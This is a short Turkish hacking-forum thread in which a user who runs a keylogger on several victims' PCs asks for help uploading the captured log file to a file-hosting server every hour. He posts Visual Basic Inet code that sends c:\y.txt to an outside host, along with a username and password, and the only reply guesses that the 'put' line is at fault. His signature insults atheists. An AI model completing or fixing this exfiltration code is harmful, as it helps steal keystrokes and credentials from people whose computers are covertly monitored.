Log Upload Yardım

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    chkarito
    chkarito's avatar
    Erkek

Ya Şu Konuda Yardım Ederseniz Süper Olacak Hergün 5 pc den ilkel yöntemle log toplamaktan sıkıldım...Keyloggerim win7de bazılarında calısmıyor bazılarındada mail atmıyor sadece svcghost.dll diye kayıt yapıyor bende bunu bir yere upload edebilecek 2. bir program yapmak istiyorum yada tek program üzerinden saatte 1 defa upload edebilecek bir şey istiyorum ama yapamıyorum yardım ederseniz sevinirim

ftp için buldugum kod calışmadı kod bu

Private Sub Form_Load()
    Inet1.AccessType = icUseDefault
    Inet1.Protocol = icHTTP
    Inet1.RemoteHost = "s2.dosya.tc"
    Inet1.RemotePort = "80"
    Inet1.Password = "sıfre"
    Inet1.UserName = "user"
    Inet1.RequestTimeout = "60"
    End Sub

Private Sub Command1_Click()
    Form1.Inet1.Execute , "put c:\y.txt/y.txt"
    End Sub

bu dosya tc için ama yanlış yaptığım noktalar var nasıl hallederim

Private Sub Form_Load()
    Inet1.AccessType = icUseDefault
    Inet1.Protocol = icHTTP
    Inet1.RemoteHost = "s2.dosya.tc"
    Inet1.RemotePort = "80"
    Inet1.Password = "123456"
    Inet1.UserName = "gowand"
    Inet1.RequestTimeout = "60"
    End Sub

Private Sub Command1_Click()
    Form1.Inet1.Execute , "put c:\y.txt/y.txt"
    End Sub

Önce solucan olarak doğup sonra balık olup balıktan maymuna (nasıl bir geçişise(bunun bilimde bile yeri yok mk)) hoooopppp vucuden insana dönüşmüş ama aklı fikri hala hayvan olan ateistlerle uğraşıyoz...Hey Allahım ya...Sen nelere kadirsin o hayvanları toplayıp yeni bir hayvan HALK ediyorsun..
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nights_judge
    nights_judge's avatar
    Erkek

Pek anlamam ama salliyorum.bu kodun en altındaki put c:/  satırı sorunlu gibi geldi bana.

Yıllarca parazit gibi yaşayıp kim güçlüyse ona yakınlaşıp bizde sizdeniz pozu veren kişilik yoksunu yalaka köpekler;Bizim VATAN sevgimizi hayal bile edemezsiniz.Bizim adımız SONSUZLUĞA uzanırken; Çok ucuza sattığınız karekterlerinizi,büyük bedeller ödeyipte geri alamadığınız zaman adınızın sadece OYUNCAKÇI dükkanlarında satılan ucuz kuklalara verildiğini göreceksiniz..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    chkarito
    chkarito's avatar
    Erkek
    nights_judge bunu yazdı

Pek anlamam ama salliyorum.bu kodun en altındaki put c:/  satırı sorunlu gibi geldi bana.

yav yokmu yardım edecekkk

Önce solucan olarak doğup sonra balık olup balıktan maymuna (nasıl bir geçişise(bunun bilimde bile yeri yok mk)) hoooopppp vucuden insana dönüşmüş ama aklı fikri hala hayvan olan ateistlerle uğraşıyoz...Hey Allahım ya...Sen nelere kadirsin o hayvanları toplayıp yeni bir hayvan HALK ediyorsun..
Toplam Hit: 1615 Toplam Mesaj: 3